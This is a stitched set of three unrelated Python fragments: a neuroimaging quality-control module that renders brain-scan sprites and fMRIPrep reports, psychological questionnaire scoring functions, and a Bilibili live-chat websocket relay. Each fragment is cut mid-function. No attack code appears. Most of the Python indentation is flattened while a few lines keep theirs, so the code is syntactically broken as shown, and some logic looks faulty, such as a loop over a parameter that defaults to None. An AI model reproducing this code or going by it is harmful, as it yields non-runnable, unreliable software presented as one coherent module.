def t_fixed(self):
return self._t_fixed
@t_fixed.setter
def t_fixed(self, value):
if value is None or value == "":
return
self._t_fixed = float(value)
# File: vaqc/vaqc.py
import base64
import re
import os.path as op
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import nibabel as nib
import numpy as np
from pathlib import Path
import pandas as pd
import nilearn.image as nim
from dipy.segment.mask import median_otsu
from nipype.utils.filemanip import save_json, load_json
def get_bids_params(fullpath):
bids_patterns = [
r'^(.*/)?(?P<subject_id>sub-[a-zA-Z0-9]+)',
'^.*_(?P<session_id>ses-[a-zA-Z0-9]+)',
'^.*_(?P<task_id>task-[a-zA-Z0-9]+)',
'^.*_(?P<acq_id>acq-[a-zA-Z0-9]+)',
'^.*_(?P<space_id>space-[a-zA-Z0-9]+)',
'^.*_(?P<rec_id>rec-[a-zA-Z0-9]+)',
'^.*_(?P<run_id>run-[a-zA-Z0-9]+)',
'^.*_(?P<dir_id>dir-[a-zA-Z0-9]+)'
]
matches = {"subject_id": None, "session_id": None, "task_id": None, "dir_id": None,
"acq_id": None, "space_id": None, "rec_id": None, "run_id": None}
for pattern in bids_patterns:
pat = re.compile(pattern)
match = pat.search(fullpath)
params = match.groupdict() if match is not None else {}
matches.update(params)
return matches
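# e.g. get_bids_params("sub-01/dwi/sub-01_ses-01_run-1_dwi.nii.gz") returns
# {"subject_id": "sub-01", "session_id": "ses-01", "run_id": "run-1", ...}
# with the unmatched entities left as None.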
def reorient_array(data, aff):
# rearrange the matrix to RAS orientation
orientation = nib.orientations.io_orientation(aff)
data_RAS = nib.orientations.apply_orientation(data, orientation)
# In RAS
return nib.orientations.apply_orientation(
data_RAS,
nib.orientations.axcodes2ornt("IPL")
)
def mplfig(data, outfile=None, as_bytes=False):
fig = plt.figure(frameon=False, dpi=data.shape[0])
fig.set_size_inches(float(data.shape[1])/data.shape[0], 1)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(data, aspect=1, cmap=plt.cm.Greys_r) # previous aspect="normal"
if outfile:
fig.savefig(outfile, dpi=data.shape[0], transparent=True)
plt.close()
return outfile
if as_bytes:
IObytes = BytesIO()
plt.savefig(IObytes, format='png', dpi=data.shape[0], transparent=True)
IObytes.seek(0)
base64_jpgData = base64.b64encode(IObytes.read())
return base64_jpgData.decode("ascii")
def mplfigcontour(data, outfile=None, as_bytes=False):
fig = plt.figure(frameon=False)
fig.set_size_inches(float(data.shape[1])/data.shape[0], 1)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
bg = np.zeros(data.shape)
bg[:] = np.nan
ax.imshow(bg, aspect=1, cmap=plt.cm.Greys_r) # used to be aspect="normal"
ax.contour(data, colors="red", linewidths=0.1)
if outfile:
fig.savefig(outfile, dpi=data.shape[0], transparent=True)
plt.close()
return outfile
    if as_bytes:
        IObytes = BytesIO()
        plt.savefig(IObytes, format='png', dpi=data.shape[0], transparent=True)
        plt.close()
        IObytes.seek(0)
        base64_jpgData = base64.b64encode(IObytes.read())
        return base64_jpgData.decode("ascii")
def load_and_reorient(filename):
img = nib.load(filename)
    data, aff = img.get_fdata(), img.affine
data = reorient_array(data, aff)
return data
def make_a_square(data_mat, include_last_dim=True):
"""Applies zero padding to make a 2d matrix a square.
Examples:
---------
>>> too_long = np.arange(4 * 7).reshape((4, 7))
>>> long_squared = make_a_square(too_long)
>>> long_squared.shape
(7, 7)
>>> long_squared.sum(1)
array([ 0, 21, 70, 119, 168, 0, 0])
>>> too_tall = np.arange(6 * 5 * 3).reshape((6, 5, 3))
>>> tall_squared = make_a_square(too_tall)
>>> tall_squared.shape
(6, 6, 6)
>>> tall_2squared = make_a_square(too_tall, include_last_dim=False)
>>> tall_2squared.shape
(6, 6, 3)
"""
shapes = data_mat.shape if include_last_dim else data_mat.shape[:-1]
# Is it already square?
if all([shape == shapes[0] for shape in shapes]):
return data_mat
n_dims_to_pad = len(shapes)
largest_side = np.argmax(shapes)
sides_to_pad = np.arange(n_dims_to_pad).tolist()
sides_to_pad.pop(largest_side)
# Must specify padding for all dims
padding = [(0, 0)] * data_mat.ndim
for side_to_pad in sides_to_pad:
needed_padding = shapes[largest_side] - shapes[side_to_pad]
left_pad = int(needed_padding // 2)
right_pad = needed_padding - left_pad
padding[side_to_pad] = (left_pad, right_pad)
return np.pad(data_mat, padding, "constant", constant_values=(0, 0))
def nearest_square(limit):
answer = 0
while (answer + 1) ** 2 < limit:
answer += 1
if (answer ** 2) == limit:
return answer
else:
return answer + 1
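# nearest_square(limit) is effectively ceil(sqrt(limit)) for non-negative limits,
# e.g. nearest_square(9) == 3 and nearest_square(10) == 4; it is used below to
# choose the number of rows when laying slices out in a square-ish mosaic.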
def create_sprite_from_tiles(tile, out_file=None, as_bytes=False):
num_slices = tile.shape[-1]
N = nearest_square(num_slices)
M = int(np.ceil(num_slices/N))
# tile is square, so just make a big arr
pix = tile.shape[0]
if len(tile.shape) == 3:
mosaic = np.zeros((N*tile.shape[0], M*tile.shape[0]))
else:
mosaic = np.zeros((N*tile.shape[0], M*tile.shape[0], tile.shape[-2]))
mosaic[:] = np.nan
helper = np.arange(N*M).reshape((N, M))
for t in range(num_slices):
x, y = np.nonzero(helper == t)
xmin = x[0] * pix
xmax = (x[0] + 1) * pix
ymin = y[0] * pix
ymax = (y[0] + 1) * pix
x_span = xmax - xmin
y_span = ymax - ymin
if len(tile.shape) == 3:
mosaic[xmin:xmax, ymin:ymax] = tile[:x_span, :y_span, t]
else:
mosaic[xmin:xmax, ymin:ymax, :] = tile[:x_span, :y_span, :, t]
if as_bytes:
img = mplfig(mosaic, out_file, as_bytes=as_bytes)
return dict(img=img, N=N, M=M, pix=pix, num_slices=num_slices)
    if out_file:
        mplfig(mosaic, out_file)
    return dict(mosaic=mosaic, N=N, M=M, pix=pix, num_slices=num_slices)
def createSprite4D(dwi_file):
# initialize output dict
output = []
    # load the file and drop the first volume
dwi = load_and_reorient(dwi_file)[:, :, :, 1:]
# create tiles from center slice on each orientation
for orient in ['sag', 'ax', 'cor']:
axis_tiles = get_middle_slice_tiles(dwi, orient)
# create sprite images for the axis
results = embed_tiles_in_json_sprite(axis_tiles, as_bytes=True)
results['img_type'] = '4dsprite'
results['orientation'] = orient
output.append(results)
return output
def square_and_normalize_slice(slice2d):
tile_data = make_a_square(slice2d)
max_value = np.percentile(tile_data, 98)
tile_data[tile_data > max_value] = max_value
return tile_data / max_value
def embed_tiles_in_json_sprite(tile_list, as_bytes=True, out_file=None):
"""Make a big rectangle containing the images for a brainsprite.
Parameters:
-----------
tile_list : list
List of 2d square numpy arrays to stick in a mosaic
Returns:
--------
mosaic : np.ndarray
Mosaic of tile images
"""
# Tiles are squares
tile_size = tile_list[0].shape[0]
num_tiles = len(tile_list)
num_tile_rows = nearest_square(num_tiles)
num_tile_cols = int(np.ceil(num_tiles/num_tile_rows))
mosaic = np.zeros((num_tile_rows * tile_size,
num_tile_cols * tile_size))
i_indices, j_indices = np.unravel_index(np.arange(num_tiles),
(num_tile_rows, num_tile_cols))
i_tile_offsets = tile_size * i_indices
j_tile_offsets = tile_size * j_indices
for tile, i_offset, j_offset in zip(tile_list, i_tile_offsets,
j_tile_offsets):
mosaic[i_offset:(i_offset + tile_size),
j_offset:(j_offset + tile_size)] = tile
if as_bytes:
img = mplfig(mosaic, out_file, as_bytes=as_bytes)
return dict(img=img, N=num_tile_rows, M=num_tile_cols,
pix=tile_size, num_slices=num_tiles)
return dict(mosaic=mosaic, N=num_tile_rows, M=num_tile_cols,
pix=tile_size, num_slices=num_tiles)
def get_middle_slice_tiles(data, slice_direction):
"""Create a strip of intensity-normalized, square middle slices.
"""
slicer = {"ax": 0, "cor": 1, "sag": 2}
all_data_slicer = [slice(None), slice(None), slice(None)]
num_slices = data.shape[slicer[slice_direction]]
slice_num = int(num_slices / 2)
all_data_slicer[slicer[slice_direction]] = slice_num
middle_slices = data[tuple(all_data_slicer)]
num_slices = middle_slices.shape[2]
slice_tiles = [square_and_normalize_slice(middle_slices[..., mid_slice])
for mid_slice in range(num_slices)]
return slice_tiles
def createB0_ColorFA_Mask_Sprites(b0_file, colorFA_file, mask_file):
colorfa = make_a_square(load_and_reorient(colorFA_file), include_last_dim=False)
b0 = make_a_square(load_and_reorient(b0_file)[:, :, :, 0])
anat_mask = make_a_square(load_and_reorient(mask_file))
# make a b0 sprite
_, mask = median_otsu(b0)
outb0 = create_sprite_from_tiles(b0, as_bytes=True)
outb0['img_type'] = 'brainsprite'
# make a colorFA sprite, masked by b0
Q = make_a_square(colorfa, include_last_dim=False)
Q[np.logical_not(mask)] = np.nan
Q = np.moveaxis(Q, -2, -1)
outcolorFA = create_sprite_from_tiles(Q, as_bytes=True)
outcolorFA['img_type'] = 'brainsprite'
# make an anat mask contour sprite
outmask = create_sprite_from_tiles(
make_a_square(anat_mask, include_last_dim=False))
img = mplfigcontour(outmask.pop("mosaic"), as_bytes=True)
outmask['img'] = img
return outb0, outcolorFA, outmask
def create_report_json(dwi_corrected_file, eddy_rms, eddy_report,
color_fa_file, anat_mask_file,
outlier_indices,
eddy_qc_file,
outpath=op.abspath('./report.json')):
report = {}
report['dwi_corrected'] = createSprite4D(dwi_corrected_file)
b0, colorFA, mask = createB0_ColorFA_Mask_Sprites(dwi_corrected_file,
color_fa_file,
anat_mask_file)
report['b0'] = b0
# report['colorFA'] = colorFA
report['anat_mask'] = mask
report['outlier_volumes'] = outlier_indices.tolist()
with open(eddy_report, 'r') as f:
report['eddy_report'] = f.readlines()
report['eddy_params'] = np.genfromtxt(eddy_rms).tolist()
eddy_qc = load_json(eddy_qc_file)
report['eddy_quad'] = eddy_qc
save_json(outpath, report)
return outpath
def create_bold_Mask_Sprites(bold_file):
boldref = load_and_reorient(str(bold_file).replace("desc-preproc_bold",
"boldref"))
boldmask = load_and_reorient(
str(bold_file).replace("desc-preproc_bold", "desc-brain_mask"))
b0 = boldref
anat_mask = boldmask
# make a boldref sprite
outb0 = create_sprite_from_tiles(b0, as_bytes=True)
outb0['img_type'] = 'brainsprite'
# make an anat mask contour sprite
outmask = create_sprite_from_tiles(
make_a_square(anat_mask, include_last_dim=False))
img = mplfigcontour(outmask.pop("mosaic"), as_bytes=True)
outmask['img'] = img
return outb0, outmask
def get_fmriprep_outlier_volumes_from_confounds(confounds_df):
"""extract which volume numbers are outliers from the fmriprep confounds df.
Returns:
bad_volumes: list
eg [34, 35, 100, 150]
"""
# get the motion columns
motion = confounds_df.filter(regex='motion')
# find any rows with values above 0
    return_df = motion[(motion > 0).any(axis=1)]
# return the index (row names) of this df
return list(return_df.index)
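# Example (hypothetical confounds): in a dataframe with columns
# "motion_outlier00" and "motion_outlier01" where only row 12 contains a 1,
# this returns [12].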
def get_fmriprep_stats_info(bold_corrected_file, confounds_df):
"""Create a dictionary that has single values per interesting thing.
@ziz
eg {"max_fd": 99.4, "max_rmsd":5, "dimension_x": 140, "subject_id}
"""
subject_info = get_bids_params(bold_corrected_file.name)
qc = {'mean_fd': np.nanmean(confounds_df.framewise_displacement),
'max_fd': np.nanmax(confounds_df.framewise_displacement),
'mean_rmsd': np.nanmean(confounds_df.rmsd),
'max_rmsd': np.nanmax(confounds_df.rmsd),
'mean_dvars': np.nanmean(confounds_df.dvars),
'max_dvars': np.nanmax(confounds_df.dvars)}
qc.update(subject_info)
qc['participant_id'] = qc['subject_id']
qc['file_name'] = bold_corrected_file.name.replace(".nii.gz", "").replace(".nii", "")
return qc
def create_bold_report_json(bold_corrected_file, confounds_file, outpath):
"""Creates a json file on disk with images and info about the fmriprep run.
"""
report = {}
report['dwi_corrected'] = createSprite4D(bold_corrected_file)
b0, mask = create_bold_Mask_Sprites(bold_corrected_file)
report['b0'] = b0
report['anat_mask'] = mask
# Load the confounds data
confounds_df = pd.read_csv(str(confounds_file), sep="\t")
# Find the outlier volumes
report['outlier_volumes'] = \
get_fmriprep_outlier_volumes_from_confounds(confounds_df)
report['eddy_params'] = np.nan_to_num(confounds_df[
['framewise_displacement', 'rmsd']].to_numpy()).tolist()
report['eddy_quad'] = {}
report['qc_scores'] = get_fmriprep_stats_info(bold_corrected_file,
confounds_df)
save_json(outpath, report)
return report['qc_scores']
def find_confounds_file(nii_file):
"""Finds the corresponding confounds.tsv file for a bold.nii.gz
Parameters:
nii_file: pathlib.Path
Returns:
confounds_file: pathlib.Path
"""
confounds_options = [str(fname).replace("desc-confounds_timeseries.tsv", "") for
fname in nii_file.parent.glob("*confound*tsv")]
confounds_file, = [fname for fname in confounds_options if
str(nii_file).startswith(fname)]
return Path(confounds_file + "desc-confounds_timeseries.tsv")
def report_from_nii(nii_file):
"""Creates a report json and returns subject QC scores dict.
Parameters:
nii_file: pathlib.Path
"""
output_file = Path(
str(nii_file).replace("desc-preproc_bold.nii.gz", "vaqc.json"))
print("Creating", str(output_file))
confounds_file = find_confounds_file(nii_file)
subject_scores = create_bold_report_json(nii_file, confounds_file,
output_file)
return subject_scores
def process_fmriprep_subject(subject_dir):
"""Creates a QC file and
Parameters:
subject_dir: pathlib.Path
"""
processed_images = list(subject_dir.rglob("**/*desc-preproc*_bold.nii.gz"))
print("found ", "\n\t".join(map(str, processed_images)))
image_qcs = []
for image_file in processed_images:
image_qcs.append(report_from_nii(image_file))
return image_qcs
def process_fmriprep(input_dir):
"""Take an fmriprep output directory and create report data
for the viewer.
Parameters:
input_dir: pathlib.Path
"""
subject_dirs = [_pth for _pth in input_dir.glob("sub-*")
if _pth.is_dir()]
summary_json = input_dir / "vaqc.json"
image_qcs = []
for subject_dir in subject_dirs:
print("Processing directory:", str(subject_dir))
image_qcs += process_fmriprep_subject(subject_dir)
    # Write out
| |
[2, 5, 7, 10, 13, 17, 20, 23],
"CalmNervous": [3, 6, 9, 12, 15, 19, 22, 24],
}
_assert_value_range(data, score_range)
# Reverse scores 3, 4, 5, 7, 9, 11, 13, 16, 18, 19, 22, 23
# (numbers in the dictionary correspond to the *positions* of the items to be reversed in the item list specified
# by the subscale dict)
data = _invert_subscales(
data,
subscales=subscales,
idx_dict={
"GoodBad": [1, 3, 5, 6],
"AwakeTired": [1, 2, 4, 7],
"CalmNervous": [0, 2, 5, 6],
},
score_range=score_range,
)
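    # (the inversion maps each raw value v to score_range[0] + score_range[1] - v,
    #  so for an illustrative score range of [1, 5] a raw item score of 2 becomes 4;
    #  this assumes the standard biopsykit inversion helper)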
mdbf_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 24:
# compute total score if all columns are present
mdbf_data[score_name] = data.sum(axis=1)
return pd.DataFrame(mdbf_data, index=data.index)
def meq(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
) -> pd.DataFrame:
"""Compute the **Morningness Eveningness Questionnaire (MEQ)**.
The MEQ measures whether a person's circadian rhythm (biological clock) produces peak alertness in the morning,
in the evening, or in between. The original study showed that the subjective time of peak alertness correlates
with the time of peak body temperature; morning types (early birds) have an earlier temperature peak than evening
types (night owls), with intermediate types having temperature peaks between the morning and evening
chronotype groups.
Besides the MEQ score the function classifies the chronotype in two stages:
* 5 levels (``Chronotype_Fine``):
* 0: definite evening type (MEQ score 14-30)
* 1: moderate evening type (MEQ score 31-41)
* 2: intermediate type (MEQ score 42-58)
* 3: moderate morning type (MEQ score 59-69)
* 4: definite morning type (MEQ score 70-86)
* 3 levels (``Chronotype_Coarse``):
* 0: evening type (MEQ score 14-41)
* 1: intermediate type (MEQ score 42-58)
* 2: morning type (MEQ score 59-86)
.. note::
This implementation assumes a score range of [1, 4], except for some columns, which have a score range
of [1, 5]. Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct
range beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
pd.DataFrame
MEQ score and Chronotype Classification
References
----------
<NAME>., & <NAME>. (1976). A self-assessment questionnaire to determine morningness-eveningness in
human circadian rhythms. *International journal of chronobiology.*
"""
score_name = "MEQ"
score_range = [1, 4]
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 19)
# some columns have scores from 1-5 => check them separately
col_idx = to_idx([1, 2, 10, 17, 18])
try:
_assert_value_range(data.iloc[:, col_idx], [1, 5])
col_mask = np.arange(0, len(data.columns))
col_mask = col_mask[~np.isin(col_mask, col_idx)]
_assert_value_range(data.iloc[:, col_mask], score_range)
except ValueRangeError as e:
raise ValueRangeError(
"This implementation of MEQ expects all values in the range {}, except the columns {}, "
"which are expected to be in the range {}! "
"Please consider converting to the correct range using "
"`biopsykit.questionnaire.utils.convert_scale()`.".format(score_range, col_idx, [1, 5])
) from e
# invert items 1, 2, 10, 17, 18 (score range [1, 5])
data = invert(data, cols=to_idx([1, 2, 10, 17, 18]), score_range=[1, 5])
    # invert items 3, 8, 9, 11, 13, 15, 19 (score range [1, 4]; item 10 was already inverted above)
data = invert(
data,
cols=to_idx([3, 8, 9, 11, 13, 15, 19]),
score_range=score_range,
)
# recode items 11, 12, 19
    data.iloc[:, to_idx(11)] = data.iloc[:, to_idx(11)].replace({1: 0, 2: 2, 3: 4, 4: 6})
    data.iloc[:, to_idx(12)] = data.iloc[:, to_idx(12)].replace({1: 0, 2: 2, 3: 3, 4: 5})
    data.iloc[:, to_idx(19)] = data.iloc[:, to_idx(19)].replace({1: 0, 2: 2, 3: 4, 4: 6})
meq_data = pd.DataFrame(data.sum(axis=1), columns=[score_name])
meq_data["Chronotype_Fine"] = bin_scale(meq_data[score_name], bins=[0, 30, 41, 58, 69, 86])
meq_data["Chronotype_Coarse"] = bin_scale(meq_data[score_name], bins=[0, 41, 58, 86])
return meq_data
def kab(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Kurzfragebogen zur aktuellen Beanspruchung (KAB)**.
The KAB measures currently perceived and expected stress in the near future.
.. note::
This implementation assumes a score range of [1, 6].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
KAB score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., & <NAME>. (1993). Kurzfragebogen zur aktuellen Beanspruchung. [Manual Beltz Test].
*Weinheim: Germany*.
"""
score_name = "KAB"
score_range = [1, 6]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 6)
_assert_value_range(data, score_range)
# Invert Item 1, 3 and 5
data = invert(data, score_range, cols=to_idx([1, 3, 5]))
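    # the KAB score is the mean of the six (partly inverted) items and therefore
    # stays within the original score range of [1, 6]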
return pd.DataFrame(data.mean(axis=1), columns=[score_name])
def stai_short(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
stai_type: Optional[Literal["state", "trait"]] = None,
) -> pd.DataFrame:
"""Compute the short version of the State Anxiety facet of the **State Trait Anxiety Inventory**.
.. note::
This implementation assumes a score range of [1, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
stai_type : any of ``state``, ``trait``
which type of STAI subscale should be computed. Default: ``state``
Returns
-------
:class:`~pandas.DataFrame`
STAI score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
    Spielberger, <NAME>. (1970). Manual for the State-Trait Anxiety Inventory. *Consulting Psychologists Press*.
"""
subscales = {"GES": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], "SKD": [2, 3, 5, 7, 9]}
_assert_num_columns(data, [10, 20])
stai_data = {}
for st in stai_type:
if st == "state":
inverted = invert(data, score_range=[1, 4], cols=to_idx([1, 4, 6, 10]))
else:
inverted = invert(data, score_range=[1, 4], cols=to_idx([3, 4, 7]))
stai_data.update(stadi(data=inverted, columns=columns, subscales=subscales, stadi_type=st))
stai = pd.DataFrame(stai_data, index=data.index)
if stai_type[0] == "state":
name = "SAI"
else:
name = "TAI"
stai.rename(
columns={
f"STADI_{stai_type[0].capitalize()}_GES": f"{name}_ges",
f"STADI_{stai_type[0].capitalize()}_SKD": f"{name}_SKD",
},
inplace=True,
)
stai[f"{name}_SKD"] /= 5
return stai
def idq_pre_scan(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Pre-Scan Imaging Distress Questionnaire** (IDQ_PRE).
.. note::
        This implementation assumes a score range of [1, 3].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
        IDQ_PRE score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., ... & <NAME>. (1997).
A study of the effects of patient anxiety, perceptions and equipment on motion artifacts in magnetic resonance
imaging. *Magnetic resonance imaging*, 15(3), 301-306.
"""
score_name = "IDQ_PRE"
score_range = [1, 3]
# create copy of data
data = data.copy()
| |
# -*- coding: utf-8 -*-
import asyncio
import enum
import json
import logging
import random
import time
import uuid
from typing import *
import aiohttp
import tornado.websocket
import api.base
import blivedm.blivedm as blivedm
import config
import models.avatar
import models.translate
import models.log
logger = logging.getLogger(__name__)
class Command(enum.IntEnum):
HEARTBEAT = 0
JOIN_ROOM = 1
ADD_TEXT = 2
ADD_GIFT = 3
ADD_MEMBER = 4
ADD_SUPER_CHAT = 5
DEL_SUPER_CHAT = 6
UPDATE_TRANSLATION = 7
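# Wire protocol: every websocket message is a JSON object of the form
# {"cmd": <Command value>, "data": ...}, e.g. a heartbeat is {"cmd": 0, "data": {}}
# (see the send_message implementations below).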
_http_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))
room_manager: Optional['RoomManager'] = None
def init():
global room_manager
room_manager = RoomManager()
class Room(blivedm.BLiveClient):
HEARTBEAT_INTERVAL = 10
    # The parse_XXX methods are redefined to reduce the dependence on field names,
    # in case Bilibili renames them
def __parse_danmaku(self, command):
info = command['info']
if info[3]:
room_id = info[3][3]
medal_level = info[3][0]
else:
room_id = medal_level = 0
return self._on_receive_danmaku(blivedm.DanmakuMessage(
None, None, None, info[0][4], None, None, info[0][9], None,
info[1],
info[2][0], info[2][1], info[2][2], None, None, info[2][5], info[2][6], None,
medal_level, None, None, room_id, None, None,
info[4][0], None, None,
None, None,
info[7]
))
def __parse_gift(self, command):
data = command['data']
return self._on_receive_gift(blivedm.GiftMessage(
data['giftName'], data['num'], data['uname'], data['face'], None,
data['uid'], data['timestamp'], None, None,
None, None, None, data['coin_type'], data['total_coin']
))
def __parse_buy_guard(self, command):
data = command['data']
return self._on_buy_guard(blivedm.GuardBuyMessage(
data['uid'], data['username'], data['guard_level'], None, None,
None, None, data['start_time'], None
))
def __parse_super_chat(self, command):
data = command['data']
return self._on_super_chat(blivedm.SuperChatMessage(
data['price'], data['message'], None, data['start_time'],
None, None, data['id'], None,
None, data['uid'], data['user_info']['uname'],
data['user_info']['face'], None,
None, None,
None, None, None,
None
))
_COMMAND_HANDLERS = {
**blivedm.BLiveClient._COMMAND_HANDLERS,
'DANMU_MSG': __parse_danmaku,
'SEND_GIFT': __parse_gift,
'GUARD_BUY': __parse_buy_guard,
'SUPER_CHAT_MESSAGE': __parse_super_chat
}
def __init__(self, room_id):
super().__init__(room_id, session=_http_session, heartbeat_interval=self.HEARTBEAT_INTERVAL)
self.clients: List['ChatHandler'] = []
self.auto_translate_count = 0
async def init_room(self):
await super().init_room()
return True
def stop_and_close(self):
if self.is_running:
future = self.stop()
future.add_done_callback(lambda _future: asyncio.ensure_future(self.close()))
else:
asyncio.ensure_future(self.close())
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
models.log.add_danmaku(self.room_id, body)
for client in self.clients:
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
def send_message_if(self, can_send_func: Callable[['ChatHandler'], bool], cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
for client in filter(can_send_func, self.clients):
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
async def _on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
asyncio.ensure_future(self.__on_receive_danmaku(danmaku))
async def __on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
if danmaku.uid == self.room_owner_uid:
            author_type = 3  # room owner (streamer)
        elif danmaku.admin:
            author_type = 2  # room admin
        elif danmaku.privilege_type != 0:  # privilege: 1 = governor, 2 = admiral, 3 = captain
            author_type = 1  # guard member
else:
author_type = 0
need_translate = self._need_translate(danmaku.msg)
if need_translate:
translation = models.translate.get_translation_from_cache(danmaku.msg)
if translation is None:
                # not cached; translate asynchronously later and push the result
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = uuid.uuid4().hex
        # use a list instead of a dict to save bandwidth
self.send_message(Command.ADD_TEXT, make_text_message(
await models.avatar.get_avatar_url(danmaku.uid),
int(danmaku.timestamp / 1000),
danmaku.uname,
author_type,
danmaku.msg,
danmaku.privilege_type,
danmaku.msg_type,
danmaku.user_level,
danmaku.urank < 10000,
danmaku.mobile_verify,
0 if danmaku.room_id != self.room_id else danmaku.medal_level,
id_,
translation
))
if need_translate:
await self._translate_and_response(danmaku.msg, id_)
async def _on_receive_gift(self, gift: blivedm.GiftMessage):
avatar_url = models.avatar.process_avatar_url(gift.face)
models.avatar.update_avatar_cache(gift.uid, avatar_url)
        if gift.coin_type != 'gold':  # ignore free (silver-coin) gifts
return
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_GIFT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': gift.timestamp,
'authorName': gift.uname,
'totalCoin': gift.total_coin,
'giftName': gift.gift_name,
'num': gift.num
})
async def _on_buy_guard(self, message: blivedm.GuardBuyMessage):
asyncio.ensure_future(self.__on_buy_guard(message))
async def __on_buy_guard(self, message: blivedm.GuardBuyMessage):
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_MEMBER, {
'id': id_,
'avatarUrl': await models.avatar.get_avatar_url(message.uid),
'timestamp': message.start_time,
'authorName': message.username,
'privilegeType': message.guard_level
})
async def _on_super_chat(self, message: blivedm.SuperChatMessage):
avatar_url = models.avatar.process_avatar_url(message.face)
models.avatar.update_avatar_cache(message.uid, avatar_url)
need_translate = self._need_translate(message.message)
if need_translate:
translation = models.translate.get_translation_from_cache(message.message)
if translation is None:
                # not cached; translate asynchronously later and push the result
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = str(message.id)
self.send_message(Command.ADD_SUPER_CHAT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': message.start_time,
'authorName': message.uname,
'price': message.price,
'content': message.message,
'translation': translation
})
if need_translate:
asyncio.ensure_future(self._translate_and_response(message.message, id_))
async def _on_super_chat_delete(self, message: blivedm.SuperChatDeleteMessage):
        self.send_message(Command.DEL_SUPER_CHAT, {
'ids': list(map(str, message.ids))
})
def _need_translate(self, text):
cfg = config.get_config()
return (
cfg.enable_translate
and (not cfg.allow_translate_rooms or self.room_id in cfg.allow_translate_rooms)
and self.auto_translate_count > 0
and models.translate.need_translate(text)
)
async def _translate_and_response(self, text, msg_id):
translation = await models.translate.translate(text)
if translation is None:
return
self.send_message_if(
lambda client: client.auto_translate,
Command.UPDATE_TRANSLATION, make_translation_message(
msg_id,
translation
)
)
def make_text_message(avatar_url, timestamp, author_name, author_type, content, privilege_type,
is_gift_danmaku, author_level, is_newbie, is_mobile_verified, medal_level,
id_, translation):
return [
# 0: avatarUrl
avatar_url,
# 1: timestamp
timestamp,
# 2: authorName
author_name,
# 3: authorType
author_type,
# 4: content
content,
# 5: privilegeType
privilege_type,
# 6: isGiftDanmaku
1 if is_gift_danmaku else 0,
# 7: authorLevel
author_level,
# 8: isNewbie
1 if is_newbie else 0,
# 9: isMobileVerified
1 if is_mobile_verified else 0,
# 10: medalLevel
medal_level,
# 11: id
id_,
# 12: translation
translation
]
def make_translation_message(msg_id, translation):
return [
# 0: id
msg_id,
# 1: translation
translation
]
class RoomManager:
def __init__(self):
self._rooms: Dict[int, Room] = {}
async def get_room(self, room_id):
